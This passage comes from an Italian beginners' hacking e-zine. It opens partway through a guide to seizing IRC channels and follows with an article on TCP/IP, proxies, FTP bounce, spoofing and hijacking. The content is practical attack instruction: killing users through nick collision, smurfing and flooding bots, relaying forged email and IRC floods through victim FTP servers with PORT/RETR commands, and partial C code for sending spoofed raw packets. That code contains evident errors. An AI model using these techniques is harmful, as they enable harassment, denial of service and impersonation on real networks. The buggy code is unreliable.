e' opless (cioe' senza operatori) e avviene uno split tra alcuni server, il taker si connette con un altro client sul server che e' splittato e ottiene l'op sul canale, in quanto e' l'unico presente. Al rejoin dei server, nessuno deoppera' il taker poiche' solo lui avra' l'op. - Quando due server splittano, si puo' trovare il modo di killare le persone a noi sgradite. Ad esempio, se il nostro "nemico" ha il nick Techno[K] (uno a caso ;D) e il suo server splitta, noi potremo joinare il server che lui non riesce a vedere e dovremo usare il suo nick. Al rejoin dei server, io e il vero Techno[K] veniamo killati dai server per nick collision, in quanto irc non consente due nick uguali. Se Techno[K] era op su un canale, ovviamente non lo avra' piu' quando rijoinera' perche' disconnesso da irc. Queste sono alcune delle tecniche principali per ottenere un canale. Ovviamente se questo canale e' mantenuto da un certo numero di bot, la cosa sara' molto piu' difficile. In questi casi, dobbiamo osservare bene il canale e capire come i bot funzionano, a quali server sono connessi, e cosi' via, e dovremo prepararci bene al take. Se si ha la possibilita' di smurfare e se si e' capaci, ve lo consiglio vivamente :) Per riuscire a fare take del canale si puo' operare in questo modo: - Far collidere i nick, come spiegato in precedenza, ma questo puo' andar bene solo se i bot sono pochi e se non sono configurati in modo che cambiano nick ogni volta che c'e' uno split. - Floodare o smurfare i bot, usando opportune tecniche... lo smurf e' sicuro, il flood dei bot invece dipende soprattutto dalla botnet sotto esame. Se essa e' configurata bene state certi che non cadranno mai i bot floodandoli con migliaia di scritte o con join o con altre cose. Lo smurf e' sicuro, come dicevo, pero' e' piu' difficile da realizzare. Occore una shell decente da cui smurfare, degli ottimi broadcast e anche bravura quindi non e' per tutti... ;) - Se notate che i bot oppano degli utenti appena essi entrano nel canale, cercate di far cadere colui che e' stato oppato e fottetegli il nick e l'ident. Il bot in qualche caso vi oppera'... e voi sarete padroni di tutto... ovviamente dovrete essere veloci a deoppare e se vi portate alcuni amici e' anche meglio. E' inutile dire che dovrete deoppare prima i bot e i cazzoni con gli script lamer, perche' sono loro che potrebbero kickarvi per massdeop. Alcuni altri consigli e raccomandazioni per l'ircwar: - Dovete sempre preparare tutto prima di farlo... se dovete fare un mass deop osservate bene la situazione, ed e' lo stesso anche per le altre operazioni. - E' ovvio che possedere alcuni bot fa comodo, non devo dirvelo io :) usate anche delle tcl buone se prevedete molti attacchi al vostro canale. - Se riuscite a takare un canale, tenetelo chiuso per uno / due giorni... questo tempo sara' necessario a far raffreddare le testoline dei padroni precedenti, e servira' anche a configurare bene il canale con i relativi bot. St0rM BriNgeR ۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰ ۰۲۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰ NOTA BY N0bodY88 = come al solito questa sezione oltre ad articoli di hacking vero e proprio contiene gli art piu' disparati sempre attinenti all'argomento hacking quindi che dire ... ... godeteveli :) ... e se vi sembra che un art dica cose sbagliate o cmq poco giuste e volete dircelo allora scrivete voi un art sull'argomento cosi' da aiutarci a migliorare sia noi membri di NewBies sia i lettori che magari sull'argomento non ne sanno molto e vanno in cerca di qualcuno che gli spieghi qualcosa o meglio che lo indirizzi verso la strada giusta... ͻ Ŀ IL MIO IP? BOH! ٺ ͼ ------------<[Il mio IP? BOH!]>---------------------------------------------- Autore: Mr_Skull Consumo: 4 toast (faccio skifo), 7 pakketti di crackers (non di hackers), 5/6 preservativi (credete che noi newbies siamo sempre attaccati al computer? Anche noi abbiamo altri piaceri, quindi, nei momenti liberi fra una scrittura e l'altra mi diletto a lanciare gavettoni a chi passa sotto il balcone... :))) Musica ascoltata: (Get your gunn, Cake and Sodomy, Antichrist Superstar Remix & Repent, I don't like the drugs, Sweet Dreams, The Horrible People, The dope show, Great Big White World, Mechanical Animals, Rock is dead)-Marilyn Manson, Freak on a leash-Korn, Narcotic-Liquido, Pretty Fly-offsping e Domenica e Luned di Branduardi. Saluti: mR_bIs0n, ZeroCool, il BFi Staff (mitici, sempre cos), il NewBies staff (togliete per gli articoli su bo e netbus :)) e Slurpzann, nonch un omaggio a Raoul Chiesa. Fuck a: Telekom, il mio preside, la mia skuola (vi ho fottuto l'abbonamento), Daniela (Marilyn Manson non fa skifo...(la musika, intendo)), al gruppo del Timone e a chi mi ritiene malato di mente.... Barzelletta: Fidati, un prodotto Microsoft. ------------------------Indice 0) Disclaima 1) IP 2) TCP & UDP, protocolli 3) Gateways & socks firewalls 4) FTP Bounce 5) Spoofing 6) Sniffing 7) Hijacking 8) Conclusione ------------------------0) Disclaima ATTENZIONE! NON MI ASSUMO UN CACCA DI RESPONSABILITA' PER L'USO CHE FARETE DI QUESTE INFORMAZIONI, QUINDI, C@221 VOSTRI. Inoltre, questo articolo scritto da un newbie per una rivista per newbies. Se troverete scontate molte cose da me scritte, abbiate pazienza. Per gli amici del gruppo "IL TIMONE": Queste informazioni mi sono state rivelate dalla Sun Microsystems, che mi sta pagando per fare pubblicit anti-microsoft (WINDOWS NON CONOSCE I RAW). Inoltre ho scritto questo articolo solo perch Zero e Nobody mi hanno promesso una cospiqua sommetta in cambio. per emailarmi: bgates@microsoft.com (scherzo ovviamente...) il mio sito web: www.fbi.gov (come sopra) ------------------------1) IP Cos' un indirizzo ip? Bene, lo spiego velocemente perch bello... allora, avete mai visto quando inserite un sito (ad es. www.microsoft.com) nel vostro browser preferito e premente invio uscire sulla barra dello stato: [Ricerca del sito in corso] [Sito web rilevato (o kualkosa di simile...)] [Connessione a 201.31.26.66] da bravi osservatori? Se no, MALE! :) allora, in questo kaso, ke kosa 201.31.26.66? Bene, quello l'indirizzo ip... Tutti i computerz in rete hanno un indirizzo ip, anke voi! Infatti, il vostro provider (nota per Eduardo Freni: proVider, e non proVVider, ma che lo leggi anche come sta scritto????) vi assegna un indirizzo ip appena entrate, in modo che anche voi possiate far parte della RETE. Come fatto un indirizzo ip? Un indirizzo ip un numero a 32 bit suddiviso in 4 blocchi da 8 (se prendiamo 255 in binario diventa 11111111, ma anche 0 da considerare un binario a 8 cifre, cio 00000000, inutile che vi dica che ogni cifra corrisponde ad un bit, vero??? :))separati da punti e che spaziano da 0 a 255, ma approposito, i numeri 0 e 255 sono in genere riservati, kuindi si pu dedurre che vedremo numeri spaziare da 1 a 254... Ora direte(?): ma come si fa da un indirizzo ip numerico a prendere il nome del "proprietario" (il proprietario un server, ad es. 66.66.6.6 -> i.am.an.all.american.antichrist) e viceversa? Basta usare il DNS, ovvero il Domain Name Server, che da un ip numerico ricava il nome dell'host e dal nome dell'host ricava l'ip numerico, naturalmente dovete sapere almeno uno di questi due per farvi rivelare l'altro (eheheh, elementare, Wazzon). Inoltre qualsiasi OS che io conosca, prende l'ip 127.0.0.1 come proprio, quindi quando sul nukenabber esce: Un koglione tenta di nukarti sula 139 dall'ip 127.0.0.1, beh, non rispondere al nuke: quel coglione sei tu :) Ma come fa quello che ti nuka a cambiare il suo indirizzo ip con quello locale di ognuno e con altri? Vedremo pi avanti, ora approfondiamo meglio il concetto di IP non come indirizzo, ma come quello che : un INTERNET PROTOCOL. Skemino: 0 15 16 31 ͻ ͻ 4 bit 4 bit 8 bit TOS 16 bit Total Lenght version head.lenType of service In bytes ͹ 16 bit 3 bit 14 bit Identification flags fragment offset ͹ 20 8 bit TTL 8 bit 16 bit bytes Time To Live protocol Header Checksum ͹ 32 bit Source IP Address ͹ 32 bit Destination IP Address ͹ ͼ Options ͹ Data ͼ Questo lo skemino dell'header IP, che si attakka come una sanguisuga su qualsiasi pakketto ke voi mandiate... Cercate di imparare bene codesto skemino (lo trovate dappertutto, pure sul ricettario di nonna Amelia), vi sar molto utile pi avanti nella vita (mai quanto le bombe di Jolly Roger :) ------------------------2) TCP e UDP, protocolli Inizio kol dire ke il TCP e l'UDP sono i protocolli di rete pi diffusi, ma ne esistono anche altri (RAW su tutti: viva lo spoof!). Il TCP quello usato da altri protocolli come HTTP, FTP, SMTP ecc ecc. mentre l'UDP pi usato nelle nuke (quelle che vi hanno fatto tanto bestemmiare su Brufolo Bill). Bisogna dire ke senza TCP il protocollo TCP/IP rimarrebbe IP(ma va'?) e kome tale diventerebbe inaffidabile, cio: io spedisko 20 pakketti ip contenenti un file frammentato ad un altro: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 il protocollo IP non ricordando l'ordine in cui i pacchetti sono stati spediti, facendo arrivare magari cos: 17 2 20 1 6 10 16 19 8 3 7 13 18 15 4 11 5 9 12 14 o magari 1 5 6 20 Beh? E allora quello kome fa a sapere qual il primo pacchetto inviato e quale l'ultimo? O peggio... arrivato il pakketto? Non pu funzionare un ftp cos! Ma se noi attakkassimo un pakketto tcp ad un header ip??? Ecco l'header TCP (AAARGH! UN'ALTRA TABELLA!!!): ͻ ͻ 16 bit 16 bit Source Port Number Destination Port Number ͹ 32 bit SEQence Number ͹ 32 bit 20 ACKnowledgement Number bytes ͹ 4 bit 6 bit 6 bit 16 bit Head.Len Reserved Flags Window size ͹ 16 bit 16 bit Checksum Urgent pointer ͹ ͼ Options ͹ Data ͼ Bene, combinato all'ip dovremmo avere: min. 20 bytes di header IP + min. 20 bytes di header TCP + data, ma bisogna considerare che un pacchetto TCP/IP non pu superare la soglia dei 65535 bytes (vi ricordate il Ping Of Death???). Ora, torniamo al problema dell'ordine dei pakketti: avete visto quel sequence number (ho evidenziato SEQ perch in molti sniffer per brevit cos mostrato, poi vedremo pi avanti)? Bene, con il sequence number il ricevente sapr benissimo quale pakketto viene prima e quale dopo. L'ACK in vece il riconoscimento, ed dato dal precedente SEQ del ricevente + il numero di bytes che questi ha inviato, mentre il SEQ il precedente ACK del ricevente... ke kasino, vero? Comunque vi ci abituerete... (io ancora non mi ci sono abituato). Bene, il discorso kambia quando si stabilisce una connessione. Chiamiamo un client A, un server B: A--->B SEQ:1118358509 ACK:0 B--->A SEQ:4143819233 ACK:1118358510 A--->B SEQ:1118358510 ACK:4143819234 (NUMERI PRESI DALL'ARTICOLO DI FuSyS, Progetto 0N0S3NDAi, BFi no.4 :)) Questo processo chiamato 3-Way Handshake, A manda un SEQ a B, ACK naturalmente 0, B risponde con un suo SEQ e con l'ACK di A incrementato di 1, ed A per confermare risponde con come SEQ l'ACK di B, e come ACK il SEQ di B+ 1, tutto chiaro? (a me no...) E da qui inizia la comunicazione. Per il protocollo UDP, kambia kualkosa... Il protocollo UDP infatti non stabilisce di una connessione, come il TCP, ha un header pi pikkolo ed leggermente pi veloce... Volete un'altra tabella? Mi dispiace, ma momentaneamente non dispongo di schemi di pacchetti UDP, cos cercher di riassumere testualmente. Un pacchetto UDP cos composto: 16 bit source port, destination port, 16 per header lenght + reserved + flags e 16 per il checksum. NB: per i bit mi sono basato sul fatto che erano shorts, il che vuol dire intero a 16 bit, da 0000 a FFFF (0 a 65535) (il numero massimo di porte), il checksum di 16 sicuramente, mentre non sono sicuro per la lunghezza: solo quella dello header o di tutto il pacchetto??? Dovrebbe essere a 16 bit, essendo uno short, ma negli altri protocolli l'header lenght di 4... Vabb, nel prossimo numero cercher di mandarvi la risposta... 8( Ora, tralasciando l'UDP (se non volete spoofare per nukare kualkuno non ve ne importer pi di tanto), sappiamo che il Source Address (indirizzo sorgente) nell'intestazione IP, mentre la Source Port nella TCP giusto? Vedremo pi avanti (vedi SPOOFING) come si mandano pacchetti spoofati. Ed ora, se non volete che nessuno sappia il vostro vero IP su IRC, ecco i... ------------------------3) Gateways & socks firewalls Cosa un gateway? Qualcuno sul numero 3 di Newbies aveva detto: Mettiamo che Gambadilegno voglia insultare Topolino, senza per fargli sapere di essere stato lui, cosa fa? Va da Pippo (il pi scemo) e gli dice: senti, vai da Topolino e digli: "@'^!##" (o qualcosa di simile (non ricordo)) e dimmi cosa ti risponde. Allora Pippo, che molto idiota, va da Topolino e gli dice: "@'^!##" (rimango nell'incertezza tuttora). Topolino allora gli risponde: "Senti Pippo, io sono sempre molto calmo e tranquillo, ma se mi dici queste cose alla fine mi farai arrabbiare..." Pippo, che non ha capito nemmeno cosa ha detto Topolino, torna da Gambadilegno e gli dice (per emulazione dei suoni) quello che gli ha detto Topolino. Vedete, prendiamo come Gambadilegno il client A, come Pippo un server dotato di wingate, chiamato B, e come Topolino un altro server, magari tin.it, tale C. Allora, una volta che A si connette a B (in genere sulla 8080), si trover davanti il prompt: Wingate> Che pu fare? Vi konnettete da qui ad un altro server e l'ip loggato sar quello del wingate o netgate (o stargate ;)) che dir si voglia... Un socks invece firewall come si usa? Il firewall usato in genere per connettersi ad IRC da un ip non proprio (pi o meno per lo stesso skopo dei gateways...) e mandare a 'ffanculo tutti coloro che tenteranno di nukare un server... Per utilizzarlo prendiamo il nostro klient IRC di fiducia (mIRC, usato dalla maggioranza), andiamo ad Options->Firewall e selezioniamo "Use socks Firewall" come host ci mettiamo il Server B e come socks va bene anche il 4, port la porta, et ual (oddio...), il gheim est fatto (sono un poliglotta), nel senso che potete benissimo clickare su Connect, e i vostri messaggi "rimbalzeranno" prima sul server B e poi arriveranno a C, quindi, se uno vi fa un DNS, al massimo vi fotte il firewall ;) Come avrete intuito (spero, altrimenti ve lo spiego io), il passaggio pi difficile TROVARE il server B. Esistono appositi scanner per Wingate, mentre se volete un firewall e se proprio non volete perdere tempo andate su un canale warez o per pedofili (maledetti!) & co., vedete le mask degli users, e almeno uno di essi sar un paranoico che per non essere bekkato entra in quei canali usando un firewall... Chiaro il concetto???? Bene, ora vedremo come fare altri skerzetti di questo tipo con una tecnica "rivelatami dalla Sun" ( :))) detta... ------------------------4) FTP Bounce Bene, sapete tutti cosa un ftp, vero? Occorre dire (almeno ad alcuni non proprio bravi con l'inglese) che bounce vuol dire "rimbalzo". Rimbalzo FTP? Cos', si mangia? No. Avete un ftp uploadabile? EHEHEH, SAPETE COME SI RITIRANO I FILES? Vabb, iniziamo dall'inizio (urka...) Quando un ftp trasmette un file ad un computer remoto, lo fa in base all'ip e alla porta specificata previamente. Non avete mai visto un client ftp in funzione? (se no, perch cavolo leggete questo articolo??? :)) Se un client munito di status-bar o ke vi fa vedere i comandi, quando ritirerete un file vedrete: PORT xxx,xxx,xxx,xxx,y,z dove le x sono il vostro indirizzo IP (intervallato per da ',' e non da '.'), mentre la y un numero che non ci interessa, e la z la porta sulla quale il client si appresta a ricevere il file. Dopodicch vedrete il comando RETR xxxxxxxx dove xxxxxxxx il nome del file che volete ritirare. Il comando PORT serve a dire al server a quale host:porta deve sendare il file, ed il client ftp lo usa per dare il nostro ip e la nostra porta. Ma se noi usassimo ad esempio: PORT 111,222,33,44,0,21 RETR Goofyfuckedbymickey.jpg che accadrebbe???? Semplice, il server ftp anzikk mandare a noi il file, lo manda all'host 111.222.33.44 sulla porta 21 (ftp, ma si possono usare anche altre porte), cos il file Goofyfuckedbymickey.jpg (eheheh, come mi venuto 'sto nome???) verr copiato anche sull'ftp 111.222.33.44 (certi files sono imperdibili :) ) (anzi, non verr copiato perch ci vuole user e pass e stor ecc...). Se siete abbastanza makkinosi avrete gi capito quali siano le cosette che si possono fare con questo stratagemma. Comunque, continuate a leggere. Se voleste mandare una fakemail a qualcuno (suppongo che sappiate come si faccia, ma in caso contrario i comandi sono commentati) senza che il vostro ip compaia minimamente nella suddetta, bene, allora potete fare cos: create un nuovo file contenente i comandi per l'SMTP (server che invia posta), ad esempio: HELO ftpvittima.com [saluta l'SMTP identificandosi come il server che usate per bounciare] MAIL FROM: [imposta l'indirizzo mail mittente come quello che ci mettete fra le <>] RCPT TO: [indirizzo del ricevente] DATA [inizio del corpo della mail] [tutte le cose che ci vanno, gli headers, ecc.] Muori lamerone! . [un punto su riga vuota termina il data] QUIT [quitta dall'smtp] bene, ed ora in teoria si potrebbe mandare all'smtp via bounce, ma di regola incrementare le dimensioni del file a circa 60 kilobytes, per non far cadere inspiegabilmente la connessione... per fare ci editate un file contenente 60000 spazi (provateci...) oppure utilizzate il debug in questo modo: [NOI] C:\>debug nomedelfileconi60000spazi [PC] File non trovato [NOI] -f 100,F000,0 [NOI] -rcx [PC] :0000 [NOI] -EA60 [NOI] -w [PC] Scrittura di EA60 bytes in corso... [NOI] -q bene, dovremmo aver creato un file chiamato nomedelfileconi60000spazi lungo all'incirca 60k e pieno di " " (spazi). ora si fa un copy /b filedeicomandi+nomedelfileconi60000spazi cmds et voil! Ecco il file cmds lungo 60k ma con i comandi all'interno. Ed ora, come utilizzare questo file??? 1) Prendete il vostro client ftp preferito e mettete sul server vittima il file "cmds" o come l'avete chiamato (naturalmente il server deve essere uploadabile...) 2) Prendete il vostro client telnet preferito e connettetevi al server vittima sulla porta 21 (ftp). 3) Ora scrivete PORT xxx,xxx,xxx,xxx,0,25 (le x sono l'indirizzo ip del server mail, se non lo sapete allora fate un DNS, mentre 25 per SMTP, lo 0 lo lasciate cos) 4) Ed infine RETR cmds (fa inviare all'ftp il file cmds all'indirizo e alla porta specificate con PORT) Che succede? L'ftp si connette al server SMTP e gli inizia a mandare il file cmds e l'smtp prende i caratteri ascii esattamente come se fosse un telnet o un client per e-mail ad inviarli. Volete un altro esempio??? Editate un file contenente: USER Pippo NICK Pippo PRIVMSG Topolino :@'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!## L'ultima riga dovete ripeterla pi volte... Oppure se conoscete bene i comandi IRC potete fare molte altre cosette, questa serve solo a far dire a Topolino la parola @'^!## ripetutamente da Pippo, che il nostro ftp di fiducia :) Nulla ci vieta di floodarlo di DCC o di mandargli ping in continuazione... Per fate 'ste cose solo in casi veramente necessari Comunque, aggiungete i soliti 60k, inviate al server e con il solito procedimento (PORT 194,243,155,43,0,6666 per connettervi a irc.tin.it sulla 6666 e poi RETR nomedelfileconicomandi) e tutto funzioner (se non avete sbagliato niente o se non ho sbagliato niente io .. :P). NOTA IMPORTANTISSIMA LEGGETELA: In alcuni casi pu essere meglio utilizzare il comando: quote "port xxx,xxx,xxx,xxx,y,z" invece di PORT solamente. Vi ho avvisati, chiaro????? Ok, ok, bello sto ftp bounce, ma come cacca si fa a vedere le risposte? Non si pu, l'ftp quel che si pu definire un attacco cieco. Ma ora vediamo lo... ------------------------5) Spoofing Lo spoofing una tecnica che ci permette di inviare pacchetti di qualsiasi genere che sembrano provenire da un determinato indirizzo quando invece vengono da tuttaltra parte... Provate a nukare qualke rompikollo dall'ip di fbi.gov (eheheh). Comunque non voglio trattare di nukes et similia, ma cercher di illustrarvi i diversi tipi di attacco spoofato. Ci sono due tipi di attacchi: quelli "ciechi" e quelli che ci permettono di vedere le risposte, "sniffando" dal server vittima all'ip che usiamo per spofare. Come si fa a mandare un pacchetto spoofato? Beh, ci sono modi e modi. Da Unix & Company molto facile: basta creare un socket RAW (un socket *molto* grezzo) e lavorarlo mettendoci sopra degli header IP e TCP (ma anche UDP o ICMP) non standard, cio come quelli che si trovano nelle librerie net*. Infatti, nel nostro header IP dovremmo mettere anche l'ip del mittente, cosa che invece con le normali funzioni di sending viene automaticamente fatta dal protocollo usato. In principio si crea un bell'header ip tipo: struct ipheader { unsigned char verlen, tos; //versione+lunghezza header, tipo unsigned short lenght, identification, flageoffset; //lunghezza, id, flags+offset unsigned char ttl, protocol; //time to live, protocollo utilizzato unsigned long int source, destination; //indirizzo ip sorgente, destinazione }; ecco, bello vero? Se esaminate attentamente vedrete: * un char (8 bit) che include sia la versione ip che la lunghezza dello header (contenitori a 4 bit non li so trovare io in c...) * un char (8 bit) per il tipo di servizio (TOS) * uno short (16 bit) per la lunghezza, uno per l'identificazione e uno che include i 3 bit dei flag e i 13 del fragment offset * un altro char per il time to live, ovvero su quanti server pu passare prima di fermarsi * un altro char che identifica il protocollo * due long (32 bit) che identificano l'ip sorgente e quello di destinazione bene, non uguale allo skemino del cap. 1? Per agevolarci ora creeremo uno pseudo ip header: struct pseudoipheader { unsigned long int source, destination; char byte_zero, protocol; unsigned short TCP_UDP_lenght; }; qui abbiamo l'ip sorgente, destinazione, il byte zero, il protocollo utilizzato e la lunghezza del tcp o dell'udp. Ora veniamo ai protocolli TCP e UDP: struct tcpheader { unsigned short source, destination; unsigned long int seq, ack; unsigned short offset_flags, window, checksum, urgent; }; da notare che i source e i destination sono non degli indirizzi, ma delle porte (short a 16 bit), qui dovete mettere la porta sorgente e quella destinazione, insomma. Poi c' il SEQ e l'ACK, interi a 32 bit, e infine abbiamo l'header lenght + reserved + flags, window, il checksum e l'urgent pointer. Ecco qui anche quello dell'udp, giusto per facilitarvi la vita :) struct udpheader { unsigned short source, destination, lenght, checksum; } Tutto chiaro no? E per finire si crea uno struct di scambio di dati spoofati, anche questo per facilitarci la vita... struct spdataexchange { int fd; char *data; int datalen; char *source; unsigned short sourceport; char *destination; unsigned short destinationport; unsigned long seq, ack; unsigned short flags; char *buffer; int ip_optlen, tcp_optlen; } In questo struct copieremo i dati ip e tcp e tutto il resto, per poi scriverlo sul pacchetto da inviare... Ora, come facciamo ad inviare un pacchetto??? Creeremo una funzione detta sendsppacket: void sendsppacket(struc spdataexchange *sp, unsigned char protcollo) { int sp_status; struct sockaddr_in *sp_serv; struct hostent *sp_help; int HEADER_BASE; bzero((char *)&sp_serv, sizeof(struct sockaddr)); sp_serv.sin_family = AF_INET; sp_serv.sin_addr.s_addr = inet_addr(sp->destination); if(sp_serv.sin_addr.s_addr==(unsigned int)-1) { if(!(sp_help=gethostbyname(sp->destination))) fprintf(stderr,"unknown host %s\n",sp->destination), exit(1); bcopy(sp_help->h_addr,(caddr_t)&sp_serv.sin_addr,sp_help->h_lenght); } switch(protocollo) { case TCP: HEADER_BASE = TCP_HEADER_BASE; break; //Spiego sotto questi passaggi case UDP: HEADER_BASE = UDP_HEADER_BASE; break; case default: exit(1); break; } sp_status = sendto(sp->fd, (char *)sp->buffer, sp->datalen+HEADER_BASE+ IP_HEADER_BASE+sp->ip_optlen, 0, (struct sockaddr *)&sp_serv, sizeof(struct sockaddr)); if((sp_status < 0) || (sp_status!=sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen)) { if(sp_status < 0) perror("sendto()\n"), exit(1); printf("Trasmessi soltanto %d bytes di %d\n", sp_stat, sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen); } } Bene, con questa funzione mandiamo i pacchetti che abbiamo creato... Dopo i procedimenti di routine si tenta di risolvere l'host di destinazione, se non si riesce si esce (splendido gioco di parole...), se invece l'host esiste si copia nel "sp_serv.sin_addr". Poi si vede il protocollo: TCP e UDP ve li definite prima con #define (TCP 6 e UDP 17), se tcp l'header_base sar ovviamente la lunghezza della dimensione minima dell'header tcp(20), se udp quella dell'udp (8) e se altro esce :), l'ip 20. Poi si manda il pacchetto spoofato realizzato prima, e si vede se il risultato positivo o meno, quanti bytes sono stati inviati, eccetera. La lunghezza naturalmente la lunghezza dei dati+l'HEADER_BASE definito prima+la lunghezza dell'header ip (20) + la lunghezza delle opzioni ip. 500 righe! Uff! Che fatica... Dovremmo esserci... Per fixare i vostri header IP e TCP, ci sono due pratiche(ALLA FACCIA!) funzioni: void sp_fix_IP_packet(struct spdataexchange *sp, unsigned char protocollo) { struct ipheader *sp_help_ip; int HEADER_BASE; switch(protocollo) { case TCP: HEADER_BASE = TCP_HEADER_BASE; break; case UDP: HEADER_BASE = UDP_HEADER_BASE; break; case default: exit(1); break; } sp_help_ip = (struct ipheader *)sp->buffer; sp_help_ip->verlen = (IP_VERSION << 4) | (IP_HEADER_BASE+sp->ip_optlen+sp->tcp_optlen); sp_help_ip->tos = 0; sp_help_ip->lenght = htons(IP_HEADER_BASE+HEADER_BASE+sp->ip_optlen+sp->tcp_optlen+sp->datalen); sp_help_ip->ID = htons(12545); sp_help_ip->flageoffset=0; sp_help_ip->ttl = 69; //miseria! Non deve morire prima del previsto... sp_help_ip->protocol = protocollo; sp_help_ip->source = sp_getaddrbyname(sp->source); sp_help_ip->destination = sp_getaddrbyname(sp->destination); sp_help_ip->checksum = in_cksum((unsigned short *) (sp->buffer), IP_HEADER_BASE+sp->ip_optlen); } Questa per l'ip... molto intuitiva, inutile che ve la spieghi. Attenzione, la funzione sp_getaddrbyname(char *) non ve la scrivo, ve la spiego brevemente: usate un HOSTENT, nel caso in cui l'host debba andare risolto. Se l'host gi numerico, si verifica l'esistenza e si ritorna il valore long della medesima. Se invece non numerico, tentiamo di risolverlo e se ci riusciamo si pu benissimo ritornare il valore long dell'host, altrimenti si da come risultato 0. Per fixare l'header TCP: void sp_fix_TCP_packet(struct spdataexchange *sp) { char *pseudo_ip_construct[1500]; struct tcpheader *sp_help_tcp; struct pseudoipheader *sp_help_pseudo_ip; int i; for(i=0;i<1500;i++) pseudo_ip_construct[i]=0; sp_help_tcp = (struct tcpheader *) (sp->buffer+IP_HEADER_BASE+sp->ip_optlen); sp_help_pseudo_ip = (struct pseudoipheader *) pseudo_ip_construct; sp_help_tcp->offset_flags = htons((((TCP_HEADER_BASE+sp->tcp_optlen)/4)<<12) | sp->flags); sp_help_tcp->seq = sp->seq; sp_help_tcp->ack = sp->ack; sp_help_tcp->source = htons(sp->sourceport); sp_help_tcp->destination = htons(sp->destinationport); sp_help_tcp->window = htons(0x7c00); sp_help_pseudo_ip->source = sp_getaddrbyname(sp->source); sp_help_pseudo_ip->destination = sp_getaddrbyname(sp->destination); sp_help_pseudo_ip->zero_byte = 0; sp_help_pseudo_ip->protocol = TCP; sp_help_pseudo_ip->TCP_UDP_lenght = htons(sp->datalen+TCP_HEADER_BASE+sp->tcp_optlen); memcpy(pseudo_ip_construct+12,sp_help_tcp,sp->datalen+TCP_HEADER_BASE+sp->optlen); sp_help_tcp->checksum = in_cksum((unsigned short *)pseudo_ip_construct, sp->datalen+12+TCP_HEADER_BASE+sp->tcp_optlen); } Ecco qua! Ultimo appunto: la in_cksum una funzione che potete trovare dappertutto, anche sul ping.c o su uno dei vari nuker... Non mi dilungo anche sull'UDP (ma questa discriminazione razziale! :)), anche perch se conoscete bene il C (spero, altrimenti che avete fatto, avete letto fin qua senza capire un c***o???) molto intuitiva da realizzare... Se rimanete nel dubbio, per, leggetevi i sorgenti di spoofit.h, una libreria che mi ha ispirato non poco. Non ricordo il nome dell'autore, un attimo... Ah, si: Bretch Claerhout. NOTICINA: se non vi va di scrivervi gli header ip, tcp e/o udp a da soli, li potete semplicemente aggiungere queste righe all'inizio del codice :) #include //contiene lo struct per lo header ip #include //contiene quello per il tcp #include //e quello per l'udp ma se ve l'avessi detto prima avreste potuto comprendere come formato un header ip??? Bene, ora, se avete imparato a spoofare, vi chiederete: come si fa a vedere le risposte che ci manda l'host vittima??? Dobbiamo fare tutto a caso? Beh, in effetti se sapete prevedere bene le risposte del server potreste farlo, ma esiste un'altra tecnica, per leggere dei pacchetti non propriamente destinati a noi... Ecco a voi lo ------------------------6) Sniffing Non mi dilungo molto sullo sniffing. C' per da dire che sniffare un pacchetto diverso che sniffare cocaina ed ha risultati meno disastrosi (a meno che non sniffiate un pacchetto di cocaina :D ). Se volete approfondire questa tecnica, vi consiglio di leggervi sia la spoofit di Bretch Claerhout che il file sniffit.c, i sorgenti dello sniffer sempre del suddetto. Oppure vi consiglio di prokurarvi uno sniffer preconfezionato, tanto cercando su astalavista.box.sk avrete solo l'imbarazzo della scelta... Lo sniffing opera solo su reti ethernet, quindi non pensate di mettervi a sniffare fbi.gov se non siete nella sua subnet... Se prendete uno sniffer, potrete avere risultati simili 100.100.100.2 > 100.100.100.1 SEQ:1233156198 ACK:0 (TTL:255, Window:255) Flags: -S---- 100.100.100.2 < 100.100.100.1 SEQ:2444444444 ACK:1233156199 (TTL:255, Window:511) Flags: -S--A- 100.100.100.2 > 100.100.100.1 SEQ:1233156200 ACK:2444444445 (TTL:255, Window:91925) Flags: ----A- (numeri a cavolo a parte, lo skema pu variare leggermente da Sniffer a sniffer) in questo caso sempre il 3 way handshake... Comunque, lo sniffing pu essere combinato allo spoofing per ottenere l' ------------------------7) Hijacking Hijacking un termine coniato durante il proibizionismo in america che consisteva nel rapinare i contrabbandieri di alcoolici. Sul mio vocabolario c' scritto anche: Rapinare, fare il doppio gioco. Ora, tralasciando le origini del termine, che cosa oggi l'hijacking??? Mettiamo che voi vi connettiate ad un host da un ip spoofato, e poi che sniffiate le risposte che l'host manda all'ip che avete scelto voi per spoofare. Bene, questo hijacking. Anche qui non mi dilungo molto, visto che c' sempre il buon vecchio Astalavista e poi nell'articolo di Bretch sullo spoofing c', oltre ai sorgenti della spoofit, anche un telnet hijacker, se non mi sbaglio. Bene, sono giunto alla ------------------------8) Conclusione Spero di avervi delucidato un po le idee sull'argomento masquerading/spoofing (che, ahinoi, al giorno d'oggi molti prendono per la stessa cosa), se ci sono errori vi prego di segnalarmeli (non errori di ortografia, naturalmente :)) e cercher di mandare un errata corridge. Naturalmente le cose che ho detto sulla Microsoft e sulla Sun Microsystem spesso sono esagerazioni (anzi, sempre), anche perch io uso linux solo quando devo fare sniff e spoof, ma per il resto uso sempre Windows 98, che molto pi semplice. Mi scuso per aver insultato il gruppo "IL TIMONE" (tutti sanno che se uno cade dal seggiolone da piccolo difficilmente si riprender) e spero che un giorno si accorgeranno che anche se fermano uno di noi, non possono fermarci tutti. Ma ora, prima della rubrica dedicata alla sessualit, vediamo quali sono i libri della settimana (Piero Angela RULEZ!!! :)): -TCP/IP Illustrated (saga in 3 volumi di cui non ne ho letto manco uno) -TCP/IP for dummies (per chi non si vuole sorbire i 3 TCP/IP Illustrated ma che, come si deduce dal titolo di questo libro, uno stupido) -La mia lunga strada dall'inferno (The long hard road out of hell)... Ok, il libro di Marilyn Manson non c'entra n kakka, ma molto bello vedere come riceve le "ali"... -I 2 libri di Bill Gates, perch sar anche scemo lo zio Bill ma fuRRRRBo -L'albero della vita per voi poveretti che ancora non sapete come nascono i bambini -Mein Kampfh (si scrive cos?) di Adolf Hitler per vedere che era davvero un pazzo -Tutti i libri di Stephen king 